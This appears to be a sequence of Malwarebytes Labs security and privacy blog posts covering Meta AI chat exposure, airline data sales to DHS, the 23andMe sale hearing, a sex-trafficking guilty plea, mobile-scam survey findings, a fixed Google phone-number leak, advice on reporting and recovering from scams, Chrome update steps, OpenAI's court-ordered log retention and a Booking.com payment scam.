Malware Bytes Security

Conversations that people are having with the Meta AI app are being exposed publicly, often without the users realizing it, revealing a variety of medical, legal, and private matters. The standalone app and the company’s integrations with artificial intelligence (AI) across its platforms—Facebook, Instagram, and WhatsApp—are now facing significant scrutiny for such privacy lapses.

The past two years have seen an explosion in generative AI tools, such as ChatGPT, Anthropic’s Claude, Google Gemini, and more. But with new players entering the market almost daily, not all of them deserve the same level of trust.

With 1 billion active monthly users, Meta AI is one of the contenders aiming for ChatGPT’s crown. To monetize this success, Meta’s CEO Zuckerberg said “there will be opportunities to either insert paid recommendations” or offer “a subscription service so that people can pay to use more compute.”

Similar to ChatGPT, Meta AI can generate text, answer questions, and help users plan, brainstorm, and strategize on various issues. But when using the Meta AI app, after submitting a question, users can also press a “share” button, which directs them to a screen showing a preview of the post, which users can then publish. But some users appear blissfully unaware that they are sharing these text conversations, audio clips, and images publicly with the world.

Other users can access “shared” conversations by using the apps Discover feed.

With only one glance at that feed, I found this example of a conversation the user might not have wanted to be publicly visible. A teacher shared an email thread regarding their upcoming arbitration of a job termination that felt unjust. The Meta AI app responded:

“Hello {name}, it’s great to hear from you again. I can sense the emotional weight of revisiting this experience, and I appreciate your trust in sharing it with me. It sounds like a really tough situation, and I’m here to listen and support you as you process it. No rush, take your time to gather your thoughts, and we can continue the conversation whenever you’re ready. How’s the preparation for the arbitration going so far?”

The emphasis is by me. If the AI realizes how much trust it takes to share that story with anyone, even if it’s only a bot, then how must it feel when the user finds out the whole world can find and read it. I didn’t even have to log in to find this conversation.

TechCrunch reported about people asking for help with tax evasion and other personal matters, calling Meta AI a “privacy disaster.” Many sources found threads about medical topics, and other conversations about delicate and private issues.

What people may not realize is that if they use the integrated versions on social media, they are logged in and their conversation can be tied to their social media profile.

How to not share your chats with Meta AI

Your best option would be not to use Meta AI at all. If you do, make sure you are not logged in and double check that fact if you are logged in on any of the Meta platforms on the same device. And never, ever use the Share button unless you mean to.

Meta spokesperson Daniel Roberts wrote in an emailed statement to WIRED that users’ chats with Meta AI are private unless users go through a multistep process to share them on the Discover feed.

When asked about these mishaps, the Meta AI chatbot said:

“Some users might unintentionally share sensitive info due to misunderstandings about platform defaults or changes in settings over time.”

However, Meta has not provided detailed, easily accessible in-app guidance at the moment of sharing, which contributes to user confusion. I decided to ask Meta AI.

Question: What do I need to do so you don’t share our conversation with the rest of the world? And is it true that the information I share with you might be used for advertising? Or, at least for “sponsored” recommendations?

Answer: Your conversations with me are used to improve the model and might be reviewed by our team to ensure quality. We may also use your conversations to train our models to be more helpful and accurate. However, we take steps to protect your privacy.

If you have concerns about how your data is used, you can visit Meta’s Privacy Center to learn more about how Meta handles data: https://www.facebook.com/privacy/center/.

Did that actually answer my question? No.

So, here are the steps you may want to take if you decide to engage with Meta AI for all the different platforms where you may encounter it.

Meta AI App

• To ensure your prompts and conversations are only visible to you:
  • Tap your profile icon in the Meta AI app.
  • Go to Data & Privacy under App settings.
  • Select Manage your information.
  • Set Make all your prompts visible to only you.
• Avoid using the Share button unless you are certain you want your conversation to appear publicly on the Discover feed.

WhatsApp, Facebook, and Instagram

Note: Conversations with Meta AI on WhatsApp are not protected by end-to-end encryption and may be used for AI training

To limit Meta’s use of your data for AI training:

• Go to Settings & Privacy > Privacy Center.
• Scroll to Privacy Topics and select AI at Meta.
• Under Submit an objection request click Your messages with AIs on WhatsApp (or any of the other platforms you’re looking for) and fill out the form to request that Meta not use your data for AI training.
  

Deleting AI conversation data

Meta has introduced commands to delete information shared in any chat with an AI:

• For example, type /reset-ai in a conversation on Messenger, Instagram, or WhatsApp to delete your AI messages.

We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

A data broker owned by some of America’s biggest airlines has been selling access to customer flight data to the US Department of Homeland Security (DHS).

The data, compiled by data broker Airlines Reporting Corporation (ARC), includes names, flight itineraries, and financial details. It also covers flights booked via US travel agencies.

ARC makes this data available to Customs and Border Protection (CBP), along with Immigration and Customs Enforcement (ICE), both of which were previously known as the US Customs Service until 2003, and both of which are offices under DHS.

ARC is owned and operated by eight major US airlines and is unique in being the only financial intermediary between the airline industry and US travel agencies, according to the data broker’s contract with ICE. ARC also provides payment settlement services for travel agencies and airlines, which has created a huge database of travel information that the data broker then makes available under its Travel Intelligence Program (TIP).

ARC’s most recently revealed contract, uncovered by tech news outlet by 404 Media, is with US Customs and Border Protection. A statement of work with that agency revealed that the TIP pilot program “generated meaningful results to current [redacted] cases and will continue to do so once fully accessible to [redacted] analysts across [redacted] Offices.”

The CBP contract mandates silence from DHS on where it got the data. The statement of work, which began in June 2024 and could optionally run until June 2029, states that the CBP will “not publicly identify vendor, or its employees, individually or collectively, as the source of the Reports unless the Customer is compelled to do so by a valid court order or subpoena and gives ARC immediate notice of same.”

ARC’s contract with ICE, meanwhile, provides a view into the data obligations from travel agencies. As the contract stated:

“Daily, travel agencies must submit ticket sales and funds for over 240 airlines worldwide to ARC. This process enables ARC’s TIP, an essential intelligence tool integrated into HSI INTEL’s investigative mission.”

HSI INTEL stands for the Homeland Security Investigations Office of Intelligence. It investigates criminal networks, and also any “individual or organization that threatens national security or seeks to exploit the customs and immigration laws of the United States,” per the DHS website.

Those with access to the TIP database can search across 39 months of flight booking data. Flight itineraries and passenger name records, along with travel dates, flight dates, and even credit card numbers are available from the database.

Other agencies that have purchased access to the database include The Secret Service, the Securities and Exchange Commission, the Drug Enforcement Administration, and the US Marshals Service, according to 404 Media.

Delta, Southwest, United, Lufthansa, Air France, American Airlines, Air Canada, Alaska Airlines, and JetBlue all have seats on the ARC board. The company also partners with hundreds of airlines and travel agencies around the world.

In a Senate hearing adequately titled “23 and You: The Privacy and National Security Implications of the 23andMe Bankruptcy,” 23andMe executives addressed concerns about the privacy implications of the company’s sale and the handling of associated genetic data.

For those who missed the latest developments, in May 2025, we reported that 23andMe had agreed to sell itself to the pharmaceutical organization Regeneron for $256 million. In that agreed sale, Regeneron was also going to acquire the genetic data of 23andMe’s customers. But in early June, 23andMe’s former CEO Anne Wojcicki put forth a last-minute bid of $305 million, throwing Regeneron’s purchase into question, and placing 23andMe itself back on auction.

The bid was made through the TTAM Research Institute, a nonprofit medical research organization recently set up by Wojcicki.

We explained earlier how consumers could (and why they maybe should) delete their genetic data from 23andMe. Apparently, people listened. Interim CEO Joe Selsavage said at the hearing that since the company’s March bankruptcy filing, 1.9 million of the company’s 15 million customers have chosen to delete their data.

Committee chairman James Comer said in opening remarks:

“It is imperative that 23andMe … ensure there is absolutely no legal or illegal way for foreign adversaries or anyone else to access or manipulate and abuse Americans’ genetic data to advance their nefarious agendas.”

The urgency of the matter, undoubtedly enhanced by the way 23andMe has handled data sales and breaches in the past, lies in the impending sale of the company.

The committee criticized the company for failing to model the potential transfer of customers’ genetic data in the upcoming sale with an “opt-in” framework, and ruled that 23andMe made it too cumbersome for consumers to delete the data—23andMe’s biggest asset in the sale.

US Representative Suhas Subramanyam of Virginia said:

“If there simply was a ‘delete my data’ page or button somewhere more prominent then I think it would be easier for a lot of people to feel that control.”

During the hearing, interim CEO Selsavage and former CEO Wojcicki repeatedly declined to commit to establishing a customer opt-in mechanism, specifically one that would require consumers’ approval before their data could be sold and transferred to a new owner, despite multiple requests from committee members.

Beyond the threat of genetic data falling into foreign hands, many raised concerns that the sale could enable targeted advertising aimed at individuals with mental health conditions, drive up insurance premiums, or restrict access to credit.

23andMe assured the committee that regardless of who wins the auction, the company will not be sold to any entity unless it agrees to uphold the existing privacy policy.

23andMe’s privacy statement tells users that any new owner must adhere to its existing data protection guidelines, which include not providing user data to insurers, employers, public databases, or law enforcement without a court order, search warrant, or subpoena.

What can consumers do to protect their data?

Customers should actively manage their data on 23andMe by reviewing policies, deleting data if desired, and staying vigilant about how their sensitive genetic information is used.

People that have submitted samples to 23andMe have three different options, each providing a different level of privacy.

1. Delete your genetic data from 23andMe

For 23andMe customers who want to delete their data from 23andMe:

• Log into your account and navigate to Settings.
• Under Settings, scroll to the section titled 23andMe data. Select View.
• You will be asked to enter your date of birth for extra security. 
• In the next section, you’ll be asked which, if there is any, personal data you’d like to download from the company (make sure you’re using a personal, not public, computer). Once you’re finished, scroll to the bottom and select Permanently delete data.
• You should then receive an email from 23andMe detailing its account deletion policy and requesting that you confirm your request. Once you confirm you’d like your data to be deleted, the deletion will begin automatically, and you’ll immediately lose access to your account. 

2. Destroy your 23andMe test sample

If you previously opted to have your saliva sample and DNA stored by 23andMe, but want to change that preference, you can do so from your account settings page, under “Preferences.”

3. Revoke permission for your genetic data to be used for research

If you previously consented to 23andMe and third-party researchers using your genetic data and sample for research, you may withdraw consent from the account settings page, under Research and Product Consents.

Check if you were caught in the 23AndMe data breach

Additionally, you may want to check if your data was exposed in the 2023 data breach. We recommend that you run a scan using our free Digital Footprint Portal to see if your data was exposed in the breach, and then to take additional steps to protect yourself (we’ll walk you through those).

SCAN NOW

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Michael James Pratt, the owner of pornographic websites GirlsDoPorn and GirlsDoToys, has pleaded guilty to sex trafficking in a US court.

Pratt ran the websites, which lured and coerced young women into filming pornographic videos, from 2013 to 2019. Pratt and his accomplices lured women from across the US and Canada to San Diego, where the filming would take place in hotel rooms or short-term rental units.

The group would advertise via online sites including Craigslist. In some cases the advertisements would promote clothed modelling jobs. It would later transpire that the work involved performing in sex videos.

When women showed doubt about appearing in such videos, Pratt and his team would convince them that the videos they made would only be distributed to a small base of private collectors outside the US, and that no one who knew the women would ever see them. Pratt would also pay other young women known as ‘reference girls’ to seal the deal by helping to persuade the victims, on the expectation that another young woman’s testimony would be more convincing.

Victims were coerced

Once the victims arrived at the airport, they would be taken to the shoot, where Pratt and his accomplices would rush them into signing contracts without giving them copies.

The perpetrators would tell the women that the shooting sessions would be short, but in fact they would take hours. Pratt and his group would bully victims into having sex on camera, according to the FBI. Sometimes they would refuse to let them leave until they completed the shoots, pressing the women to perform acts that they had previously declined. Pratt and his associates would threaten to cancel flights home or publish what had already been filmed if victims did not comply.

The operation, which ran from 2013 to 2019, targeted hundreds of people. It would post the videos on its own sites, which were available in the US for a subscription fee. The operators would also post free versions of the videos on giant adult content site Pornhub to drum up business. These were often viewed millions of times. It generated over $17 million in revenue for Pratt, who originally conceived the operation. When contacted by one victim and asked to remove a video from the site, Pratt did not reply.

A fugitive from justice

Pratt played various parts in the operation, including recruiting victims, transporting them to the shooting sessions, and filming. He had already been charged in a US court in 2019 but fled to Spain, making it onto the FBI’s most wanted list. The FBI extradited him in 2022 and he pleaded not guilty in March 2024 to 19 felony counts, including sex trafficking (of both adults and minors), production of child pornography, and conspiracy to commit money laundering.

The pornography operation had already ordered to pay $18 million to victims in 2021 after 22 women sued it for damages. The FBI has also prosecuted other people involved in the sites. Matthew Wolfe, who moved from New Zealand to begin working for Pratt in 2011 and who run multiple parts of the business, received a 14-year sentence in March 2024. Cameraman Theodore Gyi was sentenced to four years in 2022. Adult film performer Ruben Andre Garcia received 20 years on June 2021. Office manager Valerie Moser will be sentenced on September 12.

Pratt will be sentenced on September 8 this year on two counts. He faces a minimum sentence of fifteen years for sex trafficking, and a maximum penalty of life in prison. Another count of sex trafficking conspiracy also carries a maximum life sentence.

It’s become so troublesome owning a phone.

Malicious texts pose as package delivery notifications, phishing emails impersonate trusted brands, and unknown calls hide extortion attempts, virtual kidnapping schemes, or AI threats. Confusingly, even legitimate businesses now lean on outreach tactics that have long been favored by online scammers—asking people to scan QR codes, download mobile apps, and trade direct messages with, essentially, strangers.

All this junk is adding up, and it’s hurting everyday people.

According to new research conducted by Malwarebytes, 44% of people encounter a mobile scam every single day, while 78% encounter scams at least weekly. The victims of those scams—be they people who accidentally clicked on a link, filled out their information on a malicious webpage, or simply believed the person on the other side of a social media account—also suffered serious harms to their finances, emotions, and reputations. As Malwarebytes learned, 25% of scam victims were harassed or blackmailed, 19% had private info exposed, and 15% permanently lost their money.

As shared by one scam victim writing about their experience:

“I felt like I was in a horror movie. I never thought it would happen to me like this.”

These are the latest findings from original research conducted by Malwarebytes to understand the reach, frequency, and impact that mobile scams have across multiple countries. By surveying 1,300 people over the age of 18 in the US, UK, Austria, Germany, and Switzerland, Malwarebytes can reveal a mobile reality full of tension: high concern, low action, and increasingly blurred lines between what’s safe and what’s not.

The complete findings can be found in the latest report, “Tap, swipe, scam: How everyday mobile habits carry real risk.” You can read the full report below.

READ THE REPORT

Here are some of the key findings:

• 77% of people worry about mobile scams and threats. The biggest fears are around financial loss and fraud (73%), account and device lockout (70%), and identity theft (68%).
• 66% worry about the future of AI and how realistic scams are going to become.
• Just 15% of people strongly agreed: “I am confident in my ability to tell when something on my mobile phone is a scam.”
• 74% of people have encountered a social engineering scam in their lives, such as phishing attempts, fake FedEx notifications, or romance scams, and 36% have fallen victim.
• 37% of people have encountered an extortion scam and 17% have fallen victim, including 7% who were harmed specifically by a sextortion scam.  
• 10% of people have a “safe word” in their family to “protect against things like kidnapping and extortion scams.”
• 52% of scam victims suffered financially: 18% had to freeze their credit, 15% lost money permanently, and 8% had accounts opened fraudulently in their name.
• Only 20% of people use traditional security measures like antivirus, a VPN, and identity theft protection.
• 25% of people do not worry about scams at all because “it’s not something I can control.”

This is the mobile world that the public is forced to live in, and the mobile world that future generations may soon inherit. While broad, bold action is required to meaningfully catch and stop scammers, everyday people can lean on many cybersecurity best practices to stay safe and secure online. From using unique passwords, to implementing multifactor authentication (MFA), there is plenty at hand to make life more difficult for scammers.

Importantly, there’s also help from Malwarebytes.

With the launch of our free, AI-powered digital safety companion Scam Guard, users can review any concerning text, email, phone number, link, image, or online message and receive on the spot guidance to avert and report scams. Try it today and remove the fear from being online.

Scam Guard is available for both free and paid users of Malwarebytes Mobile Security (iOS and Android), without having to install an additional app.  

Try it out for yourself: Download Malwarebytes Mobile Security for iOS or Android.  

Google has fixed vulnerabilities that made it possible to retrieve the phone numbers of almost any Google user. The flaw was found in the flow that allows users to recover their Google account using a phone number.

A cybersecurity researcher called Brutecat was able to figure out the phone number linked to any Google account, information that is usually not public and is considered sensitive.

Brutecat found that the page where users can recover their Google account if they have forgotten their login details lacked BotGuard protection. BotGuard is a cloud-based cybersecurity solution designed to protect websites and web applications from malicious bots, automated attacks, crawlers, and scrapers.

However, BotGuard does not work on websites that do not use Javascript. This is because many of its advanced detection techniques rely on executing Javascript in the visitor’s browser to gather client-side data. If a website does not serve Javascript, or if a user or bot disables Javascript, BotGuard cannot collect the necessary information for fingerprinting or behavioral analysis.

Brutecat also had to use rotating IP addresses and a trick to bypass the occasional CAPTCHAs but was able to manage 40k requests per second. At that rate, if the attacker knew the country code of the phone number, it would take about 20 minutes in the US to find out the recovery phone number. In the UK that would come down to 4 minutes because they have shorter phone numbers.

For those doing the math and finding this is impossible, it’s important to know that Google displays the last two numbers of the phone number as a hint and Brutecat used Google’s own library ‘libphonenumber’ to generate valid number formats.

But the researcher also needed the full display name of a targeted account. The researcher discovered a method to leak Google account display names by exploiting a feature in Looker Studio (formerly Google Data Studio). The researcher made a report/document in Google’s Looker Studio tool. Then changed the document’s owner to the victim’s Google account (using the victim’s email address). After transferring ownership, the victim’s full name automatically appeared on the Looker Studio home page’s “Recent documents” list even if the victim never opened the document, interacted with it, or knew about it. The key to this was finding that Looker Studio’s interface still displayed names for document transfers without requiring any action from the victim, unlike other Google services that now require prior interaction.

Google spokesperson Kimberly Samra told TechCrunch:

“This issue has been fixed. We’ve always stressed the importance of working with the security research community through our vulnerability rewards program and we want to thank the researcher for flagging this issue. Researcher submissions like this are one of the many ways we’re able to quickly find and fix issues for the safety of our users.”

Google also says it’s not aware of any confirmed reports about exploits of these vulnerabilities.

Nonetheless, a weakness allowing an attacker to trace phone numbers to Google accounts like this creates a massive risk for phishing and SIM-swapping attacks—especially since the majority of users will have their primary phone number as their account recovery number.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

If you’ve been scammed it’s really important to report it, if you can, in order to help prevent others falling for the same scam, and give authorities a chance to catch the criminal who did it.

The methods in which to report a scam varies according to the country you’re in, the platforms you’re using, and the outcome of the scam, so here are the most common methods you may need. Remember to report to both the authorities and the platforms the scammers are using.

How to report a scam in the United States

• Report to the FBI’s Internet Crime Complaint Center (IC3): File a complaint online at ic3.gov as soon as possible. This is the main hub for cybercrime reports and helps with investigations and to gather intelligence about scams and the people behind them. Rapid reporting can also help support the recovery of lost funds.
• Contact local law enforcement: If you lost money, you should also file a report with your local police department.
• Notify your bank or credit card company: Inform them about the fraud in order to freeze accounts or reverse charges where possible.

How to report a scam in Canada

• Canadian Anti-Fraud Centre (CAFC): Call 1-888-495-8501 or report online. The CAFC collects fraud reports nationwide and coordinates with law enforcement and the National Cybercrime Coordination Centre (NC3).
• Local police: Report the scam to your local police department, especially if you lost money.
• Credit bureaus: It is advisable to contact Equifax Canada and TransUnion Canada to order a free credit report immediately and ask that a fraud alert be put on your file.
• Financial institutions: Notify your bank or credit card issuer immediately, but also to the financial institution that transferred the money in case that’s a different one.

How to report a scam in the United Kingdom

• Action Fraud: Report online at actionfraud.police.uk or call 0300 123 2040 (Monday to Friday, 8 am to 8 pm). Action Fraud is the national reporting center for fraud and cybercrime. It collects reports about fraud on behalf of the police in England, Wales and Northern Ireland. For fraud in Scotland please report it directly to Police Scotland.
• Local police: For urgent matters or ongoing threats, contact your local police. If the police decide not to investigate your case as a crime, you might still be able to get compensation or money back by bringing a civil case yourself. Talk to a solicitor or asset recovery agent to find out more.
• Financial institutions: Alert your bank or credit card company to suspicious transactions.

Reporting scams on popular platforms

In all countries it’s also helpful to report on the platforms where the scam took place or was initiated. Use built-in reporting tools on platforms like Facebook and WhatsApp to report scam accounts or messages:

WhatsApp

• Open the chat with the suspicious business or individual.
• Tap the business name or contact info at the top.
• Scroll down and select Report Business or Report Contact.
• Block the contact to stop further messages. The last five messages in the chat will be sent to WhatsApp.

Facebook

• Click the three dots on the post, profile, or message you want to report.
• Select Find support or report post/profile/message.
• Follow the prompts to specify whether it’s a scam or fraudulent activity.
• Facebook reviews these reports and may remove or restrict the scammer’s account so they can’t use that account anymore to defraud others.

Other platforms (e.g. Instagram, X, eBay)

• Look for “Report” or “Help” links on the profile or message.
• Follow platform-specific instructions to flag fraudulent behavior.
• Provide as much detail as possible about the scam.

Unfortunately, people getting scammed online is a frequent event. Scammers are getting better at social engineering and are using Artificial Intelligence (AI) to sound more authentic and eliminate any spelling errors.

It really can happen to anyone, so there’s no need to feel embarrassed if you have been scammed. Importantly, acting quickly can limit the damage. So here are some things you can do if you’ve been scammed.

1. Stop all communication immediately

Cut off contact with the scammer. Don’t reply to messages or calls, as this can prevent further manipulation or requests for even more money or information.

2. Secure your accounts

Change the passwords on all your online accounts, especially financial and email accounts. Use strong, unique passwords and enable multi-factor authentication (MFA) wherever possible. Start with the ones the scammer may have gained access to, but don’t stop there and check all your important accounts as well.

3. Monitor your financial statements

Check your bank, credit card, and payment service accounts for unauthorized transactions. Report suspicious activity to your banks and credit card company immediately to freeze or reverse fraudulent charges. Let them know what went down and find out how they can help you.

4. Avoid sponsored search results

It’s really important that you don’t click on sponsored search results when searching for help with resolving a scam. This kind of topic is seen by scammers as a perfect opportunity to scam you even more and they are known to outbid the rightful owners of certain brands. If you’re using a search engine, type the domain name yourself or scroll down to the regular search results.

5. Place fraud alerts and check credit reports

Contact credit bureaus to place fraud alerts on your file. This warns lenders to verify your identity before opening new accounts. Regularly review your credit reports for unfamiliar activity. If this is an option where you live, add a security freeze, more commonly called a credit freeze, to all of your credit reports for free.

• In the US, for a credit freeze contact Experian, Equifax, and TransUnion.
• In Canada, for credit monitoring and alerts contact Equifax Canada and TransUnion Canada.
• In the UK, for credit reports and monitoring contact Experian, Equifax, and TransUnion UK.

6. Try to recover your lost funds

Sadly, recovering your lost funds will not always be possible. However, you may have some options:

• If you paid the scammer by credit card, request a chargeback through your card provider.
• If you paid via bank transfer or wire, contact your bank immediately since they may be able to initiate a recall in some cases.
• If you sent the money via payment apps (e.g. PayPal, Venmo, Cash App), contact the provider to inquire about recovery options.

Never fall for people that claim they can recover payments in cryptocurrencies. These are known as recovery scams.

7. Gather evidence

Keep all records related to the scam: emails, texts, receipts, screenshots, and any communication details. This documentation supports investigations and helps law enforcement track scammers.

8. Scan your device

If you clicked any links or downloaded something during the course of the scam, make sure to scan your device with an antimalware solution. The scammer could have planted something for later use.

9. Report the scam

Reporting is crucial. It helps authorities track criminal patterns and may assist in recovering lost funds. Report to the appropriate national agencies, local police, and the platform where the scam occurred. For more details, see our article on how to report online scams.

10. Set up ongoing protection

Firstly, make sure to protect your device with a security solution like Malwarebytes Premium. Then, protect yourself in the browser using our free Browser Guard. Finally, if you want to check if something is a scam, Scam Guard—our new feature in Malwarebytes Mobile Security—allows you to upload a text, email, or DM to find out if it’s legit or a scam.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Last week on Malwarebytes Labs:

• What does Facebook know about me? (Lock and Code S06E11)
• Victims risk AsyncRAT infection after being redirected to fake Booking.com sites
• Juice jacking warnings are back, with a new twist
• The North Face warns customers about potentially stolen data
• Scammers are constantly changing the game, but so are we. Introducing Malwarebytes Scam Guard
• Google fixes another actively exploited vulnerability in Chrome, so update now!
• Ransomware hiding in fake AI, business tools
• Pornhub, RedTube, and YouPorn block access in France, VPN use set to soar
• Booking.com reservation abused as cybercriminals steal from travelers
• OpenAI forced to preserve ChatGPT chats
• How to update Chrome on every operating system

Last week on ThreatDown:

• ThreatDown introduces auto-isolation
• EDR vs MDR vs XDR – What’s the Difference?
• Criminals smuggle phishing code in SVG images

Stay safe!

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

We often write about important updates for the most popular browser, Google Chrome. Since it would be out of scope to post elaborate update instructions for every possible platform and operating system (OS)—like iOS, macOS, Windows, Android, etc.—we decided to turn this topic into a separate post that is easy to find (and link to). Also, keep in mind that not every update will be available for every platform or at the same time. You can find when the latest update for your operating system was released on this Google Chrome releases website.

Keeping your Google Chrome browser up to date is essential for security, performance, and access to the latest features. Whether you’re on Windows, Mac, Linux, Android, or iOS, updating Chrome is straightforward, if you know where to look.

But first a few words about the version numbers, because they can be confusing at times.

The Chrome version number consists of four parts separated by dots, like this:

MAJOR.MINOR.BUILD.PATCH

Each part has a specific meaning. In order of relevance they are:

• MAJOR: This number increases with significant releases that may include major new features or changes. It usually raises in increments about 7 – 8 times per year, roughly every 6 weeks, reflecting Chrome’s release cycle.
• MINOR: This number is typically zero and rarely changes. It mainly supports the versioning scheme but doesn’t usually affect how users track updates.
• BUILD: This number increases steadily and represents a specific snapshot of Chrome’s source code at a given time. It advances with each new build candidate and is the key indicator of how recent the core code is.
• PATCH: This number changes in increments for smaller fixes and security patches applied to a particular build. It resets with each new build and helps identify minor updates within the same build.

For example, a version like 137.0.7151.56 means:

• Major version 137 (the milestone release)
• Minor version 0 (standard)
• Build number 7151 (the code snapshot)
• Patch number 56 (the latest fix on that build)

Why does the version number matter?

The BUILD and PATCH numbers together uniquely identify the exact code you are running. Even if two versions share the same major number, a higher build or patch number means you have a newer, more up-to-date Chrome version.

Sometimes you might see slightly different patch numbers on the same major build, for example, 118.0.5993.117 vs. 118.0.5993.118. This usually happens because Google released a quick fix or minor patch shortly after the initial release. Both are part of the same major update, but the higher patch number is newer.

How to check if you have the latest version

To verify your Chrome version:

1. Open Chrome.
2. Click the three-dot menu (⋮) in the top-right corner.
3. Go to Help > About Google Chrome.

Chrome will display your current version and automatically check for updates. If a newer version is available, it will download and prompt you to relaunch once it’s ready updating.

Chrome is updating Update Chrome on Windows

Method 1: Use Chrome’s built-in update feature

1. Open Chrome.
2. Click the three-dot menu icon (⋮) in the top-right corner.
3. Hover over Help, then click About Google Chrome.
4. Chrome will automatically check for updates and download them if available.
5. Once downloaded, click Relaunch to complete the update.

To enable automatic updates for Google Chrome on Windows, ensure that the “Automatically update Chrome for all users” option is enabled in Chrome’s settings. You can find this setting by going to “About Google Chrome” within the Chrome settings. Closing and restarting Chrome may be required to apply the update. 

Method 2: using Windows Update (for Chrome Enterprise)

If your organization manages Chrome updates via Windows Update or group policies, updates may be automatic. Contact your IT admin if you don’t see updates.

Update Chrome on macOS

Method 1: For each device

1. Open Chrome.
2. Click the three-dot menu icon (⋮) at the top-right.
3. Select Help > About Google Chrome.
4. Chrome will check for updates and install them automatically.
5. Click Relaunch to finish updating.

You can also set up automatic browser updates for all users of your computer if Google Chrome is installed in your Applications folder. Go to “About Google Chrome,” and click Automatically update Chrome for all users.

Method 2: For Chrome Enterprise

As a Mac administrator, you can use Google Software Update to manage Chrome browser and Chrome apps updates on your users’ Mac computers.

Update Chrome on Linux

Chrome updates on Linux depend on your distribution and how you installed it.

For Debian/Ubuntu-based systems:

1. Open a terminal.
2. Run:

sudo apt update

sudo apt --only-upgrade install google-chrome-stable

3. Restart Chrome to apply updates.

For Fedora/openSUSE:

1. Open a terminal.
2. Run:

sudo dnf upgrade google-chrome-stable

3. Restart Chrome.

If you installed Chrome via a package manager, it should handle updates automatically when you update your system.

Update Chrome on Android

Chrome updates on Android are handled through the Google Play Store:

1. Open the Google Play Store app.
2. Tap your profile icon (top right).
3. Select Manage apps & device.
4. Under Updates available, look for Chrome.
5. Tap Update next to Chrome if available.

Alternatively, if you have auto-updates enabled, Chrome updates automatically. To enable auto-updates for Android apps, open the Google Play Store, tap your profile picture, go to “Manage apps and device,” and then tap “Manage.” Select the app you want to update automatically, tap the “More” button, and toggle on “Enable auto-update.”

Update Chrome on iOS (iPhone and iPad)

Chrome updates on iOS come through the Apple App Store:

1. Open the App Store.
2. Tap your profile icon at the top right.
3. Scroll down to Available Updates.
4. Find Google Chrome and tap Update.

If auto-updates are enabled on your device, Chrome updates automatically.

Chrome in App Store’s recently updated section Updating Chrome on Chrome OS

Chrome OS updates include Chrome browser updates:

1. Click the time in the bottom-right corner.
2. Click the Settings gear icon.
3. In the left menu, select About Chrome OS.
4. Click Check for updates.
5. If an update is available, it will download and install automatically.
6. Restart your Chromebook to complete the update.

Summary table of update methods

PlatformUpdate MethodNotesWindowsChrome Menu > Help > About ChromeManual or automatic updatemacOSChrome Menu > Help > About ChromeManual or automatic updateLinuxPackage manager commandsVaries by distroAndroidGoogle Play StoreManual or automatic updateiOSApple App StoreManual or automatic updateChrome OSSettings > About Chrome OSSystem update

If you still have questions about updating the Chrome browser, let us know in the comments and allow us to update this article.

OpenAI has protested a court order that forces it to retain its users’ conversations. The creator of the ChatGPT AI model objected to the order, which is part of a copyright infringement case against it by The New York Times and other publishers.

The news organizations argued that ChatGPT was presenting their content in its responses to the point where users were reading this material instead of accessing their paid content directly.

The publishers said that deleted ChatGPT conversations might show users obtaining this proprietary published content via the service.

The issue was up for debate in a January, where Judge Ona T. Wang suggested that users who heard about the legal case might delete those conversations to cover their tracks. She denied the publishers’ request for a preservation order at the time, but also asked why OpenAI couldn’t segregate and make anonymous data from users who had requested deletion. OpenAI failed to address this, Wang said, leading to her order, granted May 13.

OpenAI served with court order

Wang’s order last month said:

“OpenAI is NOW DIRECTED to preserve and segregate all output log data that would otherwise be deleted on a going forward basis until further order of the Court (in essence, the output log data that OpenAI has been destroying), whether such data might be deleted at a user’s request or because of ‘numerous privacy laws and regulations’ that might require OpenAI to do so.”

ChatGPT already retains user conversations by default, using them to train its AI model for future conversations. However, it provides an option to turn off that setting, causing all conversations with a user to be forgotten. The service also has an ad hoc temporary chat feature, which deletes a chat as soon as it’s concluded.

In a letter objecting to the order, ChatGPT said that was being forced to compromise users’ privacy.

“OpenAI is forced to jettison its commitment to allow users to control when and how their ChatGPT conversation data is used, and whether it is retained,” it said. “Every day the Preservation Order remains in place is another day OpenAI’s users are forced to forgo the privacy protections OpenAI has painstakingly put in place.”

Read OpenAI’s full response here:

OpenAI objection letterDownload

The publishers have no evidence that the deleted conversations contain more of their content, OpenAI added. It warned that users frequently share sensitive details in conversations that they expect to be deleted, including everything from financial information to intimate discussions about wedding vows.

Engineering the retention of data would take months, the AI giant added.

The background to the case

Three publishers (The New York Times, the New York Daily News and the Center for Investigative Reporting) had been suing OpenAI separately for copyright infringement. In January this year, the publishers joined their cases into a single lawsuit.

OpenAI argued that it could use the content under fair use rules because its AI model transformed the content, breaking it into tokens that it then blends with other information to serve its users.

ChatGPT has a memory

Even when it does delete chats, ChatGPT retains a separate memory of details shared in conversations that it can use to understand you better. These might include details you enter about your friends and family, or about how you like your conversations formatted. The service allows users to turn off references to these memories, or to delete them altogether.

Caution is key when giving information to any online service, especially AI services, where conversations are often fluid and free-flowing. It’s also a good idea to think twice before sharing anything you’d rather others didn’t see.

Robert Woodford, a recruitment marketing specialist, recently shared on LinkedIn how he fell victim to a highly sophisticated scam while booking a hotel in Verona through Booking.com, providing a striking example of how attacks on the hospitality industry affect travelers.

After completing a legitimate booking—and trading some communications with the hotel—Woodford received a separate message that he believed came from the official Booking.com messaging system. This message requested “missing details” and a prepayment.

But to be safe, Woodford logged into Booking.com directly rather than clicking any links. There, he found the same message in the same thread as his earlier communications with the hotel. The payment link also looked official, as it contained “bookingcom” in the URL. Woodford didn’t realize until after making the payment that the merchant’s name was incorrect and the payment was fraudulent.

Woodford’s story falls in line with a blog I wrote a few months ago about how phishers use fake CAPTCHAs to trick hotel staff into downloading malware. It also demonstrates how travelers can be deceived by increasingly sophisticated cybercriminals exploiting real booking data and trusted platforms.

